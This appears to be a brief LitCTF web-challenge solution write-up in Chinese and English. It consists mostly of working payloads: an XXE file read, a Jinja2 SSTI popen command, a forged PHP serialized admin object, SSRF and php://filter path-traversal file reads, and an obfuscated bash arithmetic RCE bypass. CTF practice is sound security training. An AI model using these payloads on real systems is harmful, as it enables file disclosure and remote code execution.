Litctf-web
exx
xxe,
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///flag" >]><user><username>&xxe;</username>
<password>1</password></user>
一个…池子
ssti,没有过滤
{{''.__class__.__mro__[1].__subclasses__()[137].__init__.__globals__['popen']('cat /flag').read()}}
SAS - Serializing Authentication System
反序列化
<?phpclass User {public $username="admin";public $password="secure_password";}
$a=new User();
echo base64_encode(serialize($a));?>
Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjE1OiJzZWN1cmVfcGFzc3dvcmQiO30=
浏览器也能套娃?
ssrf
file:///flag
高亮主题(划掉)背景查看器
文件包含伪协议
POST传
theme=php://filter/convert.base64-encode/resource=../../../../../../../../../../../../../../../../flag
根目录下
百万美元的诱惑
rce
/下
?a[]=1&b[]=2&c=2025a
/dollar.php
取反绕过,自增应该也行试了下没过。
$(())为0
$_++也为1也可以应该
${_}=""输出上一次执行结果
( ( ((~ (( ((${_}))))=-1
%24((~%24((%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))%24((~%24(())))))))
